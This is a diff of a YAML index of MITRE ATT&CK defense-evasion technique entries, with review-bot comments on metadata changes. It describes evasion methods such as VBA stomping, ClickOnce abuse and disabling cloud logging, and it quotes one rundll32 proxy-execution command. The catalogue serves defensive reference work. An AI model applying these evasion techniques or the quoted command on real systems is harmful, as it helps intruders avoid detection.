should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
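Review bot: `x_mitre_permissions_required:` with its single `- User` item is dropped from T1027.004 with nothing replacing it, while T1564.006, T1134.005 and T1218.009 earlier in this diff keep their `x_mitre_permissions_required` lists as unchanged context; confirm that the upstream v1.1 object really removed the field rather than the generator losing it during the key reorder. The reference list is also reordered (ClearSky, then ATTACK IQ, then TrendMicro), and the new `source_name: ATTACK IQ` matches the `(Citation: ATTACK IQ)` tag added to the description in the earlier hunk, so the citation will resolve.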
@@ -11107,7 +11245,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
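Review bot: the T1578.005 description drops its third paragraph (the Azure subscription creation and subscription hijacking example) together with the two citations it carried, and the following hunks bump the version to `2.0` and remove the matching `Microsoft Subscription Hijacking 2022` and `Microsoft Peach Sandstorm 2023` references, so the change is internally consistent; the one defect is the new string ending in `Cloud Regions](https://attack.mitre.org/techniques/T1535). "` with a trailing space before the closing quote, which the `|-` block scalar this hunk replaces would not have produced. Consider keeping block scalars for multi-paragraph descriptions instead of folded double-quoted strings with `\n\n`.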
@@ -11385,7 +11530,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
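Review bot: the unchanged detection text at the end of this hunk ('In AWS, monitor for: StopLogging / and DeleteTrail / .(Citation: Stopping') has stray line breaks where inline code markup was evidently stripped from the upstream string; since this object is being regenerated anyway, it is worth checking whether the generator should preserve or collapse those fragments instead of carrying the broken layout forward.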
@@ -11452,13 +11589,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
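Review bot: the platform replacement (Google Workspace, Azure AD and Office 365 out; Office Suite and Identity Provider in) is correctly paired with the x_mitre_version bump from 2.0 to 2.1, but any per-platform index derived from these entries must be regenerated in the same change, otherwise T1562.008 stays listed under platforms it no longer declares.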
@@ -11503,9 +11640,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests: []
T1564.003:
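Review bot: this reads as a pure deletion, but `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are re-inserted earlier in the same object in the two preceding hunks, so only `spec_version` actually disappears; a stable key order in the serializer would turn these reorder-only diffs into something reviewable field by field.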
@@ -11588,18 +11722,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
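Review bot: the two BlackHat PDF URLs in the new T1127.002 external_references (Burke/CISA ClickOnce Paper and Burke/CISA ClickOnce BlackHat) carry Google Analytics tracking query strings (`?_gl=1*...&_ga=...`); strip them down to the bare `https://i.blackhat.com/USA-19/Wednesday/...pdf` path so the reference is stable and does not embed a session-linkage token. Separately, the new T1127.002 and T1070.010 entries have no `identifier:` key while neighbouring entries such as T1564.003 carry one, so check whether the index generator expects it.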
@@ -11632,10 +11888,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -11672,40 +11927,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
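Review bot: the large removal at the top of T1578.002 is a key reorder rather than a drop (the platform, marking, id and reference fields reappear in the next hunk), but because whole blocks move rather than individual values the diff is hard to audit; consider sorting keys canonically in the generator so future regenerations produce field-level diffs.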
@@ -11714,20 +11939,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
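Review bot: the Mandiant M-Trends 2020 reference changes its URL from content.fireeye.com to a mandiant.com PDF but keeps 'Retrieved April 24, 2020'; the retrieval date should move with the URL, as was done for the nccgroup reference further down in this patch. Also `x_mitre_permissions_required: User` is dropped from T1578.002 (the same happens for T1556.001 and T1556.005 later) with no equivalent field added, so any consumer that filters on it needs updating.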
@@ -11757,7 +12012,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
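Review bot: the `modified` timestamp for T1055.009 goes backwards, from 2021-04-29 to 2020-06-20; a regenerated object should not carry an older modification date than the one it replaces, so either the source dataset is stale or the previous value was wrong. The same regression appears for T1601.001 and T1070.009 below and deserves a sentence in the commit message.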
@@ -11800,8 +12055,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
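Review bot: T1055.009 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` here and, unlike the other entries in this patch, nothing in this hunk sets `x_mitre_attack_spec_version: 3.2.0` in their place; unless the field is emitted earlier in the object (outside the visible context), this technique ends up with no attack spec version at all.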
@@ -11848,7 +12101,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11914,12 +12167,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
